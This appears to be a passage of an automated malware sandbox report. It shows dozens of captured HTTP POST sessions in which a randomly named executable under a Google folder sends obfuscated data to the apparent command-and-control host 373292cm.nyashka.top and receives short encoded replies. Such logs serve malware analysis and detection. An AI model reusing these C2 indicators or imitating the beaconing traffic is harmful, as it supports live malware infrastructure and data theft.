                                    Aug 25, 2024 15:46:05.810275078 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:06.168597937 CEST | 2544 | OUT | Data Raw: 5f 56 59 53 51 42 54 58 5b 5f 5a 51 59 50 58 50 57 50 5d 5b 57 5b 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _VYSQBTX[_ZQYPXPWP][W[SUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.X,E5<Y" *>=?<X=([+Y /3W#8(^"3)\;.&F$.Y/
                                    Aug 25, 2024 15:46:06.483537912 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:06.680321932 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:06 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    27 | 192.168.2.8 | 49740 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:06.809633970 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:07.167834044 CEST | 2544 | OUT | Data Raw: 5a 56 5c 5e 54 40 54 5e 5b 5f 5a 51 59 51 58 56 57 59 5d 5f 57 58 53 5e 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZV\^T@T^[_ZQYQXVWY]_WXS^YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.X;#!>7 #5*(?.>?#\#,71()4)8>&F$.Y/=
                                    Aug 25, 2024 15:46:07.484222889 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:07.684962034 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:07 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    28 | 192.168.2.8 | 49741 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:07.811333895 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:08.169755936 CEST | 2544 | OUT | Data Raw: 5a 51 5c 50 51 40 54 5b 5b 5f 5a 51 59 51 58 52 57 5b 5d 52 57 5b 53 5f 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZQ\PQ@T[[_ZQYQXRW[]RW[S_YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,'A"-4]"0%)-7(?#Y ,S!1$*)"3=;>&F$.Y/=
                                    Aug 25, 2024 15:46:08.475213051 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:08.674283028 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:08 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    29 | 192.168.2.8 | 49742 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:08.887392044 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1848
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:09.245925903 CEST | 1848 | OUT | (request body)
                                    Aug 25, 2024 15:46:09.551217079 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:09.677927017 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:09 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    30 | 192.168.2.8 | 49743 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:09.005213976 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:09.355165958 CEST | 2544 | OUT | (request body)
                                    Aug 25, 2024 15:46:09.688239098 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:09.822043896 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:09 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    31 | 192.168.2.8 | 49744 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:09.950496912 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:10.308393955 CEST | 2544 | OUT | (request body)
                                    Aug 25, 2024 15:46:10.622824907 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:10.755474091 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:10 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    32 | 192.168.2.8 | 49745 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:10.888930082 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:11.248800039 CEST | 2544 | OUT | (request body)
                                    Aug 25, 2024 15:46:11.570883036 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:11.775015116 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:11 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    33 | 192.168.2.8 | 49746 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:11.904768944 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:12.262065887 CEST | 2544 | OUT | (request body)
                                    Aug 25, 2024 15:46:12.594561100 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:12.725961924 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:12 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    34 | 192.168.2.8 | 49747 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:12.862628937 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:13.214818001 CEST | 2544 | OUT | (request body)
                                    Aug 25, 2024 15:46:13.557440042 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:13.691586971 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    35 | 192.168.2.8 | 49748 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:14.061595917 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:14.418987036 CEST | 2544 | OUT | (request body)


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    36 | 192.168.2.8 | 49749 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:14.690418959 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1848
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:15.042740107 CEST | 1848 | OUT | (request body)
                                    Aug 25, 2024 15:46:15.356370926 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:15.486095905 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:14 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    37 | 192.168.2.8 | 49750 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:14.810148954 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:15.167776108 CEST | 2544 | OUT | (request body)
                                    Aug 25, 2024 15:46:15.476811886 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:15.681623936 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:15 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    38 | 192.168.2.8 | 49751 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:15.814445972 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:16.167793989 CEST | 2544 | OUT | (request body)
                                    Aug 25, 2024 15:46:16.500545979 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:16.698179960 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:16 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    39 | 192.168.2.8 | 49752 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:16.924304008 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:17.277184010 CEST | 2544 | OUT | (request body)
                                    Aug 25, 2024 15:46:17.607327938 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:17.808878899 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:17 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    40 | 192.168.2.8 | 49753 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:17.935178995 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2536
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:18.292678118 CEST | 2536 | OUT | (request body)
                                    Aug 25, 2024 15:46:18.606100082 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:18.734035969 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:18 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    41 | 192.168.2.8 | 49754 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:18.856750965 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:19.216394901 CEST | 2544 | OUT | (request body)
                                    Aug 25, 2024 15:46:19.524247885 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:19.656255960 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:19 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    42 | 192.168.2.8 | 49755 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:19.789414883 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2536
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:20.136524916 CEST | 2536 | OUT | (request body)
                                    Aug 25, 2024 15:46:20.459351063 CEST | 25 | IN | HTTP/1.1 100 Continue


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    43 | 192.168.2.8 | 49756 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:20.528590918 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1860
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:20.886771917 CEST | 1860 | OUT | (request body)
                                    Aug 25, 2024 15:46:21.194999933 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:21.327636003 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    44 | 192.168.2.8 | 49757 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:20.873373985 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2536
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:21.555902004 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:21.689743042 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:21 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    45 | 192.168.2.8 | 49758 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:22.025393963 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:22.707878113 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:22.841639042 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:22 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    46 | 192.168.2.8 | 49759 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:22.966831923 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:23.632026911 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:23.829214096 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:23 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    47 | 192.168.2.8 | 49760 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:23.955229044 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:24.622371912 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:24.750601053 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:24 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    48 | 192.168.2.8 | 49761 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:24.872899055 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
